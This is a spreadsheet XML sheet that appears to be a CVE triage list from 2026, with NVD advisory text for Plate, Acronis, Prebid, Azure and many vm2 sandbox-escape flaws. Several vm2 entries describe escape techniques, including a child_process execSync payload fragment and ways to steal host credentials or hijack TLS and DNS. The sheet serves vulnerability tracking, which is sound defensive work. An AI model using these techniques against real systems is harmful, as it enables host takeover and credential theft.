      <c r="S38" s="5" t="inlineStr">
        <is>
          <t>### Summary
HTML strings passed to Plate's core deserialization APIs were parsed in the active document. Certain HTML attributes could therefore trigger browser behavior during parsing, before the content was converted into editor nodes.
Applications that deserialize HTML from untrusted or cross-user sources may be affected.
### Impact
An attacker who can control HTML later deserialized in another user's browser may be able to execute script in that application's origin.
### Remediation
Upgrade to `@platejs/core` 53.3.11 or later. Users of the discontinued 54.0.0 beta builds should install the fixed stable line. Applications should also sanitize untrusted HTML before rendering it; inert parsing is not a substitute for sanitization.</t>
        </is>
      </c>
      <c r="T38" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88976</t>
        </is>
      </c>
    </row>
  </sheetData>
  <autoFilter ref="A1:T38"/>
  <conditionalFormatting sqref="E2:E3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CVE-2026-87886</t>
        </is>
      </c>
      <c r="D2" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E2" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F2" s="5" t="inlineStr">
        <is>
          <t>security@acronis.com</t>
        </is>
      </c>
      <c r="G2" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H2" s="5" t="inlineStr"/>
      <c r="I2" s="5" t="inlineStr"/>
      <c r="J2" s="5" t="inlineStr"/>
      <c r="K2" s="5" t="inlineStr">
        <is>
          <t>acronis:backup</t>
        </is>
      </c>
      <c r="L2" s="5" t="inlineStr"/>
      <c r="M2" s="5" t="inlineStr"/>
      <c r="N2" s="5" t="inlineStr">
        <is>
          <t>KEV, NVD</t>
        </is>
      </c>
      <c r="O2" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P2" s="5" t="inlineStr">
        <is>
          <t>2026-09-18</t>
        </is>
      </c>
      <c r="Q2" s="5" t="inlineStr">
        <is>
          <t>2026-09-19</t>
        </is>
      </c>
      <c r="R2" s="5" t="inlineStr">
        <is>
          <t>CWE-276</t>
        </is>
      </c>
      <c r="S2" s="5" t="inlineStr">
        <is>
          <t>Local privilege escalation due to insecure file permissions. The following products are affected: Acronis Backup plugin for cPanel &amp; WHM (Linux) before build 1.9.3.1021, Acronis Backup extension for Plesk (Linux) before build 1.8.11.638, Acronis Backup plugin for DirectAdmin (Linux) before build 1.2.3.238.</t>
        </is>
      </c>
      <c r="T2" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87886</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CVE-2026-87886</t>
        </is>
      </c>
      <c r="D2" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E2" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F2" s="5" t="inlineStr">
        <is>
          <t>security@acronis.com</t>
        </is>
      </c>
      <c r="G2" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H2" s="5" t="inlineStr"/>
      <c r="I2" s="5" t="inlineStr"/>
      <c r="J2" s="5" t="inlineStr"/>
      <c r="K2" s="5" t="inlineStr">
        <is>
          <t>acronis:backup</t>
        </is>
      </c>
      <c r="L2" s="5" t="inlineStr"/>
      <c r="M2" s="5" t="inlineStr"/>
      <c r="N2" s="5" t="inlineStr">
        <is>
          <t>KEV, NVD</t>
        </is>
      </c>
      <c r="O2" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P2" s="5" t="inlineStr">
        <is>
          <t>2026-09-18</t>
        </is>
      </c>
      <c r="Q2" s="5" t="inlineStr">
        <is>
          <t>2026-09-19</t>
        </is>
      </c>
      <c r="R2" s="5" t="inlineStr">
        <is>
          <t>CWE-276</t>
        </is>
      </c>
      <c r="S2" s="5" t="inlineStr">
        <is>
          <t>Local privilege escalation due to insecure file permissions. The following products are affected: Acronis Backup plugin for cPanel &amp; WHM (Linux) before build 1.9.3.1021, Acronis Backup extension for Plesk (Linux) before build 1.8.11.638, Acronis Backup plugin for DirectAdmin (Linux) before build 1.2.3.238.</t>
        </is>
      </c>
      <c r="T2" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87886</t>
        </is>
      </c>
    </row>
    <row r="3">
      <c r="A3" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B3" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C3" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54734</t>
        </is>
      </c>
      <c r="D3" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E3" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F3" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G3" s="5" t="inlineStr"/>
      <c r="H3" s="5" t="inlineStr"/>
      <c r="I3" s="5" t="inlineStr"/>
      <c r="J3" s="5" t="inlineStr"/>
      <c r="K3" s="5" t="inlineStr"/>
      <c r="L3" s="5" t="inlineStr"/>
      <c r="M3" s="5" t="inlineStr"/>
      <c r="N3" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O3" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P3" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q3" s="5" t="inlineStr"/>
      <c r="R3" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S3" s="5" t="inlineStr">
        <is>
          <t>Prebid Server Java is the Java version of Prebid Server. Prior to 3.43.0, certain bidder adapters interpolate user-supplied parameters into outbound request URLs without using HttpUtil to validate the resulting domain or path segment. A malicious actor who can supply bid-request parameters can cause the server to send HTTP requests to unintended destinations, potentially reaching internal network services, metadata endpoints, or other sensitive server endpoints with the server's network access. This issue is fixed in version 3.43.0.</t>
        </is>
      </c>
      <c r="T3" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54734</t>
        </is>
      </c>
    </row>
    <row r="4">
      <c r="A4" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B4" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C4" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62104</t>
        </is>
      </c>
      <c r="D4" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E4" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F4" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G4" s="5" t="inlineStr"/>
      <c r="H4" s="5" t="inlineStr"/>
      <c r="I4" s="5" t="inlineStr"/>
      <c r="J4" s="5" t="inlineStr"/>
      <c r="K4" s="5" t="inlineStr"/>
      <c r="L4" s="5" t="inlineStr"/>
      <c r="M4" s="5" t="inlineStr"/>
      <c r="N4" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O4" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P4" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q4" s="5" t="inlineStr"/>
      <c r="R4" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="S4" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Remote Code Execution (RCE) in Migratico Lite &lt;= 2.6.8 versions.</t>
        </is>
      </c>
      <c r="T4" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62104</t>
        </is>
      </c>
    </row>
    <row r="5">
      <c r="A5" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B5" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C5" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69399</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2026-09-17</t>
        </is>
      </c>
      <c r="P5" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q5" s="5" t="inlineStr"/>
      <c r="R5" s="5" t="inlineStr">
        <is>
          <t>CWE-441</t>
        </is>
      </c>
      <c r="S5" s="5" t="inlineStr">
        <is>
          <t>Azure Arc Elevation of Privilege Vulnerability</t>
        </is>
      </c>
      <c r="T5" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69399</t>
        </is>
      </c>
    </row>
    <row r="6">
      <c r="A6" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B6" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C6" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69865</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2026-09-17</t>
        </is>
      </c>
      <c r="P6" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q6" s="5" t="inlineStr"/>
      <c r="R6" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S6" s="5" t="inlineStr">
        <is>
          <t>Authorization bypass through user-controlled key in Microsoft Container Registry allows an unauthorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T6" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69865</t>
        </is>
      </c>
    </row>
    <row r="7">
      <c r="A7" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B7" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C7" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70200</t>
        </is>
      </c>
      <c r="D7" s="5" t="n">
        <v>10</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2026-09-17</t>
        </is>
      </c>
      <c r="P7" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q7" s="5" t="inlineStr"/>
      <c r="R7" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-285</t>
        </is>
      </c>
      <c r="S7" s="5" t="inlineStr">
        <is>
          <t>Improper limitation of a pathname to a restricted directory ('path traversal') in Azure Logic Apps allows an unauthorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T7" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70200</t>
        </is>
      </c>
    </row>
    <row r="8">
      <c r="A8" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B8" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C8" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83944</t>
        </is>
      </c>
      <c r="D8" s="5" t="n">
        <v>10</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2026-09-17</t>
        </is>
      </c>
      <c r="P8" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q8" s="5" t="inlineStr"/>
      <c r="R8" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="S8" s="5" t="inlineStr">
        <is>
          <t>Improper access control in Azure Logic Apps allows an unauthorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T8" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83944</t>
        </is>
      </c>
    </row>
    <row r="9">
      <c r="A9" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B9" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C9" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85889</t>
        </is>
      </c>
      <c r="D9" s="5" t="n">
        <v>10</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2026-09-17</t>
        </is>
      </c>
      <c r="P9" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q9" s="5" t="inlineStr"/>
      <c r="R9" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="S9" s="5" t="inlineStr">
        <is>
          <t>Missing authentication for critical function in Azure AI Foundry allows an unauthorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T9" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85889</t>
        </is>
      </c>
    </row>
    <row r="10">
      <c r="A10" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B10" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C10" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92937</t>
        </is>
      </c>
      <c r="D10" s="5" t="n">
        <v>10</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2026-09-17</t>
        </is>
      </c>
      <c r="P10" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q10" s="5" t="inlineStr"/>
      <c r="R10" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="S10" s="5" t="inlineStr">
        <is>
          <t>vm2 3.11.6 is vulnerable to a sandbox escape leading to remote code execution in the host Node.js process. The fix for GHSA-m283-3h24-438v is incomplete: the bridge gate at lib/bridge.js:1624 identity-checks only the direct call target when deciding whether to rebuild/sanitise a rejected host Promise value. Registering the rejection handler through Function.prototype.call or .apply indirection (e.g., p.then.call(p, undefined, cb)) makes the intercepted target host Function.prototype.call, so the sanitiser never runs and the raw host error reaches sandbox code with its own properties intact. If an embedder exposes a host-realm Promise to the sandbox (an async host function bridged via the sandbox option, or a NodeVM external module's async method) and that Promise rejects with an Error carrying a non-primitive own property referencing a host object (for example err.detail = process), untrusted code in the sandbox obtains a fully functional proxy to that host object and can execute arbitrary commands with the privileges of the host process (e.g., e.detail.mainModule.require('child_process').execSync(...)). The direct p.then(undefined, cb), bind, and Reflect.apply forms are correctly sanitised. Fixed in vm2 3.11.7.</t>
        </is>
      </c>
      <c r="T10" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92937</t>
        </is>
      </c>
    </row>
    <row r="11">
      <c r="A11" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B11" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C11" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92940</t>
        </is>
      </c>
      <c r="D11" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E11" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F11" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G11" s="5" t="inlineStr"/>
      <c r="H11" s="5" t="inlineStr"/>
      <c r="I11" s="5" t="inlineStr"/>
      <c r="J11" s="5" t="inlineStr"/>
      <c r="K11" s="5" t="inlineStr"/>
      <c r="L11" s="5" t="inlineStr"/>
      <c r="M11" s="5" t="inlineStr"/>
      <c r="N11" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O11" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P11" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q11" s="5" t="inlineStr"/>
      <c r="R11" s="5" t="inlineStr">
        <is>
          <t>CWE-668</t>
        </is>
      </c>
      <c r="S11" s="5" t="inlineStr">
        <is>
          <t>vm2 versions 3.11.3 through 3.11.6 expose the host process's real https.globalAgent to sandboxed code when a NodeVM is explicitly configured to allow require('https'). The builtin loader wraps host modules in a read-only proxy, but method calls such as Agent.prototype.on() are forwarded to the underlying host object, so sandbox code can register a listener for the agent's 'free' event. When an unrelated host HTTPS request releases a pooled connection, the listener receives the live host request options and the host TLSSocket, allowing sandboxed code to read the host's Authorization header and private destination host/port, attach a data listener to the released socket and read subsequent host response bodies in plaintext, and issue attacker-chosen authenticated requests using the stolen credentials. The issue is fixed in 3.11.7.</t>
        </is>
      </c>
      <c r="T11" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92940</t>
        </is>
      </c>
    </row>
    <row r="12">
      <c r="A12" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B12" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C12" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92941</t>
        </is>
      </c>
      <c r="D12" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E12" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F12" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G12" s="5" t="inlineStr"/>
      <c r="H12" s="5" t="inlineStr"/>
      <c r="I12" s="5" t="inlineStr"/>
      <c r="J12" s="5" t="inlineStr"/>
      <c r="K12" s="5" t="inlineStr"/>
      <c r="L12" s="5" t="inlineStr"/>
      <c r="M12" s="5" t="inlineStr"/>
      <c r="N12" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O12" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P12" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q12" s="5" t="inlineStr"/>
      <c r="R12" s="5" t="inlineStr">
        <is>
          <t>CWE-732</t>
        </is>
      </c>
      <c r="S12" s="5" t="inlineStr">
        <is>
          <t>vm2 versions from 3.11.3 before 3.11.7 expose the host tls module to NodeVM sandbox code, allowing attackers to call tls.setDefaultCACertificates() and replace process-wide certificate authorities. Attackers with access to allowed tls and url builtins can use URLSearchParams to create host-realm arrays and manipulate the TLS trust store, enabling subsequent host HTTPS clients to accept attacker-controlled certificates.</t>
        </is>
      </c>
      <c r="T12" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92941</t>
        </is>
      </c>
    </row>
    <row r="13">
      <c r="A13" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B13" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C13" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92946</t>
        </is>
      </c>
      <c r="D13" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E13" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F13" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G13" s="5" t="inlineStr"/>
      <c r="H13" s="5" t="inlineStr"/>
      <c r="I13" s="5" t="inlineStr"/>
      <c r="J13" s="5" t="inlineStr"/>
      <c r="K13" s="5" t="inlineStr"/>
      <c r="L13" s="5" t="inlineStr"/>
      <c r="M13" s="5" t="inlineStr"/>
      <c r="N13" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O13" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P13" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q13" s="5" t="inlineStr"/>
      <c r="R13" s="5" t="inlineStr">
        <is>
          <t>CWE-913</t>
        </is>
      </c>
      <c r="S13" s="5" t="inlineStr">
        <is>
          <t>vm2 before 3.11.7 contains a remote code execution vulnerability when require.external is enabled without an explicit require.root that excludes node_modules. Sandboxed code can require vm2's own package, instantiate an unrestricted NodeVM instance, and execute arbitrary host OS commands via child_process.</t>
        </is>
      </c>
      <c r="T13" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92946</t>
        </is>
      </c>
    </row>
    <row r="14">
      <c r="A14" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B14" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C14" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92947</t>
        </is>
      </c>
      <c r="D14" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E14" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F14" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G14" s="5" t="inlineStr"/>
      <c r="H14" s="5" t="inlineStr"/>
      <c r="I14" s="5" t="inlineStr"/>
      <c r="J14" s="5" t="inlineStr"/>
      <c r="K14" s="5" t="inlineStr"/>
      <c r="L14" s="5" t="inlineStr"/>
      <c r="M14" s="5" t="inlineStr"/>
      <c r="N14" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O14" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P14" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q14" s="5" t="inlineStr"/>
      <c r="R14" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="S14" s="5" t="inlineStr">
        <is>
          <t>vm2 before 3.11.7 exposes Node's shared Buffer pool to sandboxed code, allowing disclosure of host memory used by Buffer.from, Buffer.concat, and related allocations. Sandboxed code can read and write to host-realm buffers by acquiring ArrayBuffers from small allocations, leading to sensitive data exposure and potential denial-of-service.</t>
        </is>
      </c>
      <c r="T14" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92947</t>
        </is>
      </c>
    </row>
    <row r="15">
      <c r="A15" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B15" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C15" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92953</t>
        </is>
      </c>
      <c r="D15" s="5" t="n">
        <v>10</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2026-09-17</t>
        </is>
      </c>
      <c r="P15" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q15" s="5" t="inlineStr"/>
      <c r="R15" s="5" t="inlineStr">
        <is>
          <t>CWE-913</t>
        </is>
      </c>
      <c r="S15" s="5" t="inlineStr">
        <is>
          <t>vm2 versions from 3.11.0 before 3.11.8 fail to protect host TypedArray and ArrayBuffer prototypes from sandbox mutation. Attackers can use prototype-walking primitives to reach and modify host Uint8Array.prototype, %TypedArray%.prototype, and ArrayBuffer.prototype, causing host-created typed arrays to observe attacker-controlled properties after VM.run() returns.</t>
        </is>
      </c>
      <c r="T15" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92953</t>
        </is>
      </c>
    </row>
    <row r="16">
      <c r="A16" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B16" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C16" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92955</t>
        </is>
      </c>
      <c r="D16" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E16" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F16" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G16" s="5" t="inlineStr"/>
      <c r="H16" s="5" t="inlineStr"/>
      <c r="I16" s="5" t="inlineStr"/>
      <c r="J16" s="5" t="inlineStr"/>
      <c r="K16" s="5" t="inlineStr"/>
      <c r="L16" s="5" t="inlineStr"/>
      <c r="M16" s="5" t="inlineStr"/>
      <c r="N16" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O16" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P16" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q16" s="5" t="inlineStr"/>
      <c r="R16" s="5" t="inlineStr">
        <is>
          <t>CWE-913</t>
        </is>
      </c>
      <c r="S16" s="5" t="inlineStr">
        <is>
          <t>vm2 before 3.11.8 contains a sandbox escape vulnerability in NodeVM that allows attackers to access the host __proto__ getter/setter through console._stdout and console._stderr. Attackers can overwrite EventEmitter.prototype.emit and trigger process events to execute code with process context, bypassing code generation restrictions.</t>
        </is>
      </c>
      <c r="T16" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92955</t>
        </is>
      </c>
    </row>
    <row r="17">
      <c r="A17" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B17" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C17" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92956</t>
        </is>
      </c>
      <c r="D17" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E17" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F17" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G17" s="5" t="inlineStr"/>
      <c r="H17" s="5" t="inlineStr"/>
      <c r="I17" s="5" t="inlineStr"/>
      <c r="J17" s="5" t="inlineStr"/>
      <c r="K17" s="5" t="inlineStr"/>
      <c r="L17" s="5" t="inlineStr"/>
      <c r="M17" s="5" t="inlineStr"/>
      <c r="N17" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O17" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P17" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q17" s="5" t="inlineStr"/>
      <c r="R17" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="S17" s="5" t="inlineStr">
        <is>
          <t>vm2 versions 3.10.1 through 3.11.6 contain a sandbox escape reachable from a default `new VM()` sandbox when running on Node.js 26. WebAssembly.compileStreaming and WebAssembly.instantiateStreaming can produce a raw host-realm Promise that rejects with a host-realm error object; by controlling Symbol.species via Promise.prototype.finally, sandbox code receives that raw host error, walks from the host error constructor to the host Function constructor, and recovers the real host `process` object, gaining host Node.js capabilities (e.g. access to host modules such as fs) in the context of the process running the sandbox. No NodeVM, require permission, host object injection, or otherwise unsafe configuration is required. This is a bypass of the fix for GHSA-6j2x-vhqr-qr7q, which removed the JSPI entry points WebAssembly.promising and WebAssembly.Suspending. The issue is fixed in 3.11.7.</t>
        </is>
      </c>
      <c r="T17" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92956</t>
        </is>
      </c>
    </row>
    <row r="18">
      <c r="A18" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B18" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C18" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92960</t>
        </is>
      </c>
      <c r="D18" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E18" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F18" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G18" s="5" t="inlineStr"/>
      <c r="H18" s="5" t="inlineStr"/>
      <c r="I18" s="5" t="inlineStr"/>
      <c r="J18" s="5" t="inlineStr"/>
      <c r="K18" s="5" t="inlineStr"/>
      <c r="L18" s="5" t="inlineStr"/>
      <c r="M18" s="5" t="inlineStr"/>
      <c r="N18" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O18" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P18" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q18" s="5" t="inlineStr"/>
      <c r="R18" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="S18" s="5" t="inlineStr">
        <is>
          <t>vm2 before 3.11.6 fails to restrict access to os and dns builtins under the builtin: ['*'] configuration, allowing sandbox code to read host process identity and network topology. Attackers can invoke dns.setServers() to hijack the host process DNS resolver globally, redirecting all subsequent host DNS queries through an attacker-controlled resolver.</t>
        </is>
      </c>
      <c r="T18" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92960</t>
        </is>
      </c>
    </row>
    <row r="19">
      <c r="A19" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B19" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C19" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85885</t>
        </is>
      </c>
      <c r="D19" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="E19" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F19" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G19" s="5" t="inlineStr"/>
      <c r="H19" s="5" t="inlineStr"/>
      <c r="I19" s="5" t="inlineStr"/>
      <c r="J19" s="5" t="inlineStr"/>
      <c r="K19" s="5" t="inlineStr"/>
      <c r="L19" s="5" t="inlineStr"/>
      <c r="M19" s="5" t="inlineStr"/>
      <c r="N19" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
